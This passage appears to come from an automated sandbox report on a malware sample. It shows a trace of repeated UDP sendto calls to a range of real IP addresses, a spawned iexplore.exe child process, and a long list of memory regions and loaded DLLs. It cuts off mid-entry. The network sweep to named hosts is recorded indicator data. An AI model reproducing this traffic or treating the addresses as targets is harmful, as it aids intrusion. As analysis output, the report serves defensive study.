to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.201"), tolen=16 | out: buf=0x282960*) returned 49 [0045.532] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.202"), tolen=16 | out: buf=0x282960*) returned 49 [0045.532] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.203"), tolen=16 | out: buf=0x282960*) returned 49 [0045.532] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.204"), tolen=16 | out: buf=0x282960*) returned 49 [0045.532] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.205"), tolen=16 | out: buf=0x282960*) returned 49 [0045.532] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.206"), tolen=16 | out: buf=0x282960*) returned 49 [0045.532] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.207"), tolen=16 | out: buf=0x282960*) returned 49 [0045.533] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.208"), tolen=16 | out: buf=0x282960*) returned 49 [0045.533] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.209"), tolen=16 | out: buf=0x282960*) returned 49 [0045.533] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.210"), tolen=16 | out: buf=0x282960*) returned 49 [0045.533] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.211"), tolen=16 | out: buf=0x282960*) returned 49 [0045.533] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.212"), tolen=16 | out: buf=0x282960*) returned 49 [0045.533] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.213"), tolen=16 | out: buf=0x282960*) returned 49 [0045.534] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.214"), tolen=16 | out: buf=0x282960*) returned 49 [0045.534] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.215"), tolen=16 | out: buf=0x282960*) returned 49 [0045.534] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.216"), tolen=16 | out: buf=0x282960*) returned 49 [0045.534] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.217"), tolen=16 | out: buf=0x282960*) returned 49 [0045.534] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.218"), tolen=16 | out: buf=0x282960*) returned 49 [0045.534] sendto (in: s=0xe0, buf=0x282960*, len=49, flags=0, to=0x173fccc*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.219"), tolen=16 | out: buf=0x282960*) returned 49 [0096.121] GetCurrentThread () returned 0xfffffffe [0096.121] GetCurrentProcess () returned 0xffffffff [0096.121] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x173fefc, dwDesiredAccess=0x2, bInheritHandle=1, dwOptions=0x0 | out: lpTargetHandle=0x173fefc*=0xd4) returned 1 [0096.121] CloseHandle (hObject=0xd4) returned 1 [0096.121] GetCurrentThreadId () returned 0xa54 [0096.121] GetLastError () returned 0x0 [0096.121] SetLastError (dwErrCode=0x0) [0096.121] FreeLibraryAndExitThread (hLibModule=0x400000, dwExitCode=0x0) Thread: id = 3 os_tid = 0xb5c Thread: id = 4 os_tid = 0xb60 Thread: id = 6 os_tid = 0xb70 Process: id = "2" image_name = "iexplore.exe" filename = "c:\\program files\\internet explorer\\iexplore.exe" page_root = "0x7ea16680" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa44" cmd_line = "\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" -nohome" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 237 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 238 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 239 start_va = 0x40000 end_va = 0xe5fff entry_point = 0x40000 region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files\\internet explorer\\iexplore.exe") Region: id = 240 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 241 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 242 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 243 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 244 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 245 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 246 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 247 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 248 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 249 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 250 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 251 start_va = 0x753f0000 end_va = 0x753fbfff entry_point = 0x753f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 252 start_va = 0x75420000 end_va = 0x7553cfff entry_point = 0x75420000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 253 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 254 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 255 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 256 start_va = 0x76650000 end_va = 0x76744fff entry_point = 0x76650000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 257 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 258 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 259 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 260 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 261 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 262 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 263 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 264 start_va = 0x76e70000 end_va = 0x76fa5fff entry_point = 0x76e70000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 265 start_va = 0x76fb0000 end_va = 0x771aafff entry_point = 0x76fb0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 266 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 267 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 268 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 269 start_va = 0x3c0000 end_va = 0x487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 270 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 271 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 272 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 273 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 274 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 275 start_va = 0x170000 end_va = 0x171fff entry_point = 0x170000 region_type = mapped_file name = "iexplore.exe.mui" filename = "\\Program Files\\Internet Explorer\\en-US\\iexplore.exe.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\iexplore.exe.mui") Region: id = 276 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 277 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 278 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 279 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 280 start_va = 0x1240000 end_va = 0x150efff entry_point = 0x1240000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 281 start_va = 0x6cff0000 end_va = 0x6da6ffff entry_point = 0x6cff0000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 282 start_va = 0x72360000 end_va = 0x7239bfff entry_point = 0x72360000 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 283 start_va = 0x75820000 end_va = 0x75824fff entry_point = 0x75820000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 284 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x2a0000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 285 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 286 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 287 start_va = 0x490000 end_va = 0x491fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 288 start_va = 0x4a0000 end_va = 0x4a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 289 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 290 start_va = 0x4b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 291 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 292 start_va = 0x4c0000 end_va = 0x4ebfff entry_point = 0x4c0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 293 start_va = 0x4f0000 end_va = 0x4f7fff entry_point = 0x4f0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 294 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x500000 region_type = mapped_file name = "index.dat" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 295 start_va = 0x16f0000 end_va = 0x17effff entry_point = 0x0 region_type = private name = "private_0x00000000016f0000" filename = "" Region: id = 296 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 297 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 298 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 299 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 300 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 301 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 302 start_va = 0x1510000 end_va = 0x160ffff entry_point = 0x0 region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 303 start_va = 0x1680000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 304 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 305 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 306 start_va = 0x1830000 end_va = 0x192ffff entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 307 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 308 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 309 start_va = 0x510000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 310 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 311 start_va = 0x1610000 end_va = 0x1610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001610000" filename = "" Region: id = 312 start_va = 0x6e8a0000 end_va = 0x6e8f9fff entry_point = 0x6e8a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 313 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 314 start_va = 0x1a30000 end_va = 0x1a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 315 start_va = 0x1ad0000 end_va = 0x1bcffff entry_point = 0x0 region_type = private name = "private_0x0000000001ad0000" filename = "" Region: id = 316 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 317 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 318 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 319 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 320 start_va = 0x1d00000 end_va = 0x1dfffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 321 start_va = 0x1e50000 end_va = 0x1f4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 322 start_va = 0x6e700000 end_va = 0x6e707fff entry_point = 0x6e700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 323 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 324 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 441 start_va = 0x771b0000 end_va = 0x7722afff entry_point = 0x771b0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 442 start_va = 0x5fff0000 end_va = 0x5fffffff entry_point = 0x0 region_type = private name = "private_0x000000005fff0000" filename = "" Region: id = 443 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 444 start_va = 0x1930000 end_va = 0x1a0efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001930000" filename = "" Region: id = 445 start_va = 0x20c0000 end_va = 0x20fffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 446 start_va = 0x6e440000 end_va = 0x6e472fff entry_point = 0x6e440000 region_type = mapped_file name = "sqmapi.dll" filename = "\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll") Region: id = 447 start_va = 0x1620000 end_va = 0x1620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001620000" filename = "" Region: id = 448 start_va = 0x1630000 end_va = 0x1630fff entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 449 start_va = 0x1640000 end_va = 0x1640fff entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 450 start_va = 0x1650000 end_va = 0x1651fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001650000" filename = "" Region: id = 451 start_va = 0x1660000 end_va = 0x1661fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001660000" filename = "" Region: id = 452 start_va = 0x1670000 end_va = 0x1670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001670000" filename = "" Region: id = 453 start_va = 0x1a10000 end_va = 0x1a7dfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001a10000" filename = "" Region: id = 454 start_va = 0x1f70000 end_va = 0x206ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 455 start_va = 0x2220000 end_va = 0x231ffff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 456 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 457 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 458 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 459 start_va = 0x16c0000 end_va = 0x16c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016c0000" filename = "" Region: id = 460 start_va = 0x16d0000 end_va = 0x16d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016d0000" filename = "" Region: id = 461 start_va = 0x2100000 end_va = 0x21fffff entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 462 start_va = 0x725f0000 end_va = 0x72604fff entry_point = 0x725f0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 463 start_va = 0x72610000 end_va = 0x72661fff entry_point = 0x72610000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 464 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 465 start_va = 0x73390000 end_va = 0x7339cfff entry_point = 0x73390000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 466 start_va = 0x16e0000 end_va = 0x16e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000016e0000" filename = "" Region: id = 467 start_va = 0x2460000 end_va = 0x255ffff entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 468 start_va = 0x6e710000 end_va = 0x6e715fff entry_point = 0x6e710000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 469 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 470 start_va = 0x738f0000 end_va = 0x738fffff entry_point = 0x738f0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 471 start_va = 0x1c20000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 472 start_va = 0x1cd0000 end_va = 0x1cdffff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 473 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 474 start_va = 0x17f0000 end_va = 0x180ffff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 475 start_va = 0x1c30000 end_va = 0x1c8cfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 476 start_va = 0x2570000 end_va = 0x266ffff entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 477 start_va = 0x2800000 end_va = 0x28fffff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 478 start_va = 0x2900000 end_va = 0x2cf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002900000" filename = "" Region: id = 479 start_va = 0x6e450000 end_va = 0x6e47cfff entry_point = 0x6e450000 region_type = mapped_file name = "ieui.dll" filename = "\\Windows\\System32\\ieui.dll" (normalized: "c:\\windows\\system32\\ieui.dll") Region: id = 480 start_va = 0x71f50000 end_va = 0x71f54fff entry_point = 0x71f50000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 481 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 482 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 